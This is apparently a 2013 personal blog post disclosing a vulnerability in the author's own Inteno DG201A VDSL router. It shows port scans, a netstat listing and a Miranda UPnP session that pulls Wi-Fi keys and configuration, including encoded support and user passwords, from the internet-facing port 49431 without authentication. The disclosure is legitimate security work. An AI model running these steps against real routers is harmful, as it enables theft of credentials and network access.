Did you know that you can navigate the posts by swiping left and right?
Hacking Inetno DG201A
07 Nov 2013
. category:
Hacking
.
#hacking
#reverseengineering
#vulnerability
I have ran my VDSL2 box happily in bridge mode and thinking that there is not that much of risk because the box should be just forwarding the packets to my firewall. After doing some changes to my VDSL -box I realized that for some strange reason it will take IP from the Internet even when it should be in bridged mode.
And it means I need to check how secure it is.
Information
nmap from lan:
$ nmap -v -sT -p 1-65535 -A 192.168.1.1
...
Nmap scan report for 192.168.1.1
Host is up (0.019s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open ssh Dropbear sshd 0.46 (protocol 2.0)
|_ssh-hostkey: 1040 7c:17:56:30:1e:48:96:50:8d:eb:ad:64:c9:93:ed:b4 (RSA)
23/tcp open telnet?
80/tcp open http micro_httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 501)
|_http-title: Inteno Residential Gateway
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
1780/tcp open tcpwrapped
30005/tcp open unknown
44401/tcp open unknown
49431/tcp open upnp Belkin/Linksys wireless router UPnP (Linux 2.4; UPnP 1.0; BRCM400 1.0)
Service Info: OS: Linux; Device: router
Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.3.4)
| Name: Unknown\Unknown
|_ System time: 2013-11-07 23:06:46 UTC+0
From Internet
Nmap scan report for x x
Host is up (0.0097s latency).
Not shown: 55588 filtered ports, 9943 closed ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
|_ftp-anon: ERROR: Script execution failed (use -d to debug)
22/tcp open tcpwrapped
23/tcp open telnet?
80/tcp open http?
30005/tcp open unknown
49431/tcp open unknwon
Even though port 21,22,23 and 80 seems to be open from Internet, those are not serving anyone on Internet.
netstat
# ./netstat
Proto Local Address Local Port Remote Address Remote Port State PID Process
----------------------------------------------------------------------------------------------------------------------------------------------------
tcp 213.216.244.4 5060 0.0.0.0 0 LISTEN 1230 /bin/vodsl -m 0
tcp 0.0.0.0 139 0.0.0.0 0 LISTEN 1197 /bin/smbd -D
tcp 0.0.0.0 44401 0.0.0.0 0 LISTEN 241 /bin/smd
tcp 192.168.1.1 1780 0.0.0.0 0 LISTEN 965 /bin/bcmupnp -D
tcp 0.0.0.0 30005 0.0.0.0 0 LISTEN 241 /bin/smd
tcp 0.0.0.0 49431 0.0.0.0 0 LISTEN 849 /bin/tr64c -m 0
tcp 0.0.0.0 445 0.0.0.0 0 LISTEN 1197 /bin/smbd -D
udp 127.0.0.1 40100 0.0.0.0 0 LISTEN 965 /bin/bcmupnp -D
udp 0.0.0.0 53 0.0.0.0 0 LISTEN 255 /bin/dnsproxy
udp 213.216.244.4 5060 0.0.0.0 0 LISTEN 1230 /bin/vodsl -m 0
udp 0.0.0.0 50000 0.0.0.0 0 LISTEN 973 /bin/eapd
udp 0.0.0.0 40920 0.0.0.0 0 LISTEN 255 /bin/dnsproxy
udp 0.0.0.0 35943 0.0.0.0 0 LISTEN 253 /bin/busybox -n -C -l 7 -R 10.0.0.1:514 -r 7
udp 0.0.0.0 5098 0.0.0.0 0 LISTEN 850 /bin/dsldiagd
udp 0.0.0.0 5099 0.0.0.0 0 LISTEN 850 /bin/dsldiagd
udp 0.0.0.0 1900 0.0.0.0 0 LISTEN 965 /bin/bcmupnp -D
udp 0.0.0.0 1900 0.0.0.0 0 LISTEN 849 /bin/tr64c -m 0
udp 0.0.0.0 5100 0.0.0.0 0 LISTEN 850 /bin/dsldiagd
udp 0.0.0.0 38000 0.0.0.0 0 LISTEN 973 /bin/eapd
udp 0.0.0.0 50032 0.0.0.0 0 LISTEN 823 /bin/wlevt
Port 30005
Some kind of SOAP interface?
$ curl -v 213.216.244.4:30005
* About to connect() to 213.216.244.4 port 30005 (#0)
* * Trying 213.216.244.4...
* * connected
* * Connected to 213.216.244.4 (213.216.244.4) port 30005 (#0)
* > GET / HTTP/1.1
* > User-Agent: curl/7.26.0
* > Host: 213.216.244.4:30005
* > Accept: */*
>
> < HTTP/1.1 401 Unauthorized
> < Content-Length: 0
> < WWW-Authenticate: Digest realm="IgdAuthentication", domain="/", nonce="YzhjYzJkOGM6MzYzOTMwZjA6NjViZDJmMTQ=", qop="auth", algorithm=MD5, opaque="5ccc09c403ebaf9f0171e9517f40e41"
> <
> * Connection #0 to host 213.216.244.4 left int
>
Port 49431
This UPnP service is available also from the Internet.
curl -v http://192.168.1.1:49431/devicedesc.xml
* About to connect() to 192.168.1.1 port 49431 (#0)
* Trying 192.168.1.1... connected
* Connected to 192.168.1.1 (192.168.1.1) port 49431 (#0)
> GET /devicedesc.xml HTTP/1.1
> User-Agent: curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.21.4 OpenSSL/0.9.8x zlib/1.2.5
> Host: 192.168.1.1:49431
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< SERVER: LINUX/2.4 UPnP/1.0 BRCM400/1.0
< DATE: Fri, 08 Nov 2013 00:38:54 GMT
< CONTENT-TYPE: application/octet-stream
< Cache-Control: max-age=1
< PRAGMA: no-cache
< Connection: Close
<
<?xml version="1.0"?>
<root xmlns="urn:dslforum-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.1.1:49431/</URLBase>
<device>
<deviceType>urn:dslforum-org:device:InternetGatewayDevice:1</deviceType>
<presentationURL>http://192.168.1.1:80/</presentationURL>
<friendlyName>Broadcom ADSL Router</friendlyName>
<manufacturer>Broadcom</manufacturer>
<manufacturerURL>http://www.broadcom.com/</manufacturerURL>
<modelDescription>Broadcom single-chip ADSL router</modelDescription>
<modelName>BRCM963xx</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.broadcom.com/</modelURL>
<serialNumber>D20124H126013910</serialNumber>
<UDN>uuid:10f89122-4807-11e3-8730-0022071b7f82</UDN>
<serviceList>
<service>
<serviceType>urn:dslforum-org:service:IPPingDiagnostics:1</serviceType>
<serviceId>urn:dslforum-org:serviceId:IPPingDiagnostics1</serviceId>
<controlURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/IPPingDiagnostics:1</controlURL>
<eventSubURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/IPPingDiagnostics:1</eventSubURL>
<SCPDURL>/dynsvc/IPPingDiagnostics:1.xml</SCPDURL>
...
Vulnerability in UPnP service
After lots of search, I managed to found more hacker friendly tool for testing UPnP and I used miranda: Miranda-upnp
Proess name of this service is tr64c so most likely it is made for operator to do some remote management. I am not 100% what is the purpose of this service but you can get some really nasty information out of the device and you can even change e.g WLAN (Wi-Fi) configuration with it.
Here is sample:
$ python miranda.py -s upnp-inteno.mir
Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com
Host data restored:
[0] 10.0.2.187:8888
[1] 192.168.1.1:49431
[2] 192.168.1.1:49431
[3] 213.216.x.x:49431
[4] 85.131.x.x:49431
upnp> host get 3
Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...
Host data enumeration complete!
upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys
NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase :
NewPreSharedKey : 12345678
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration
NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
<InternetGatewayDevice>
<LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
<WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
<DeviceInfo>
<ProvisioningCode>12345</ProvisioningCode>
<FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
<VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
</DeviceInfo>
<X_BROADCOM_COM_SyslogCfg>
<Status>Enabled</Status>
<Option>local buffer and remote</Option>
<LocalDisplayLevel>Debug</LocalDisplayLevel>
<ServerIPAddress>10.0.0.1</ServerIPAddress>
</X_BROADCOM_COM_SyslogCfg>
<X_BROADCOM_COM_LoginCfg>
<SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
<UserPassword>dXNlcgo=</UserPassword>
</X_BROADCOM_COM_LoginCfg>
...
As you can see, you can get WLAN-keys, Configuration including Support and User passwords and much more, without any authentication. This is sad.
You can not disable this service and it is directly at the Internet even when the device is in bridge mode.
Update
Feel free to contact me for more info or just to give feedback. e-mail: mikko.kenttala(ä)gmail.com IRC: turmio@IRCnet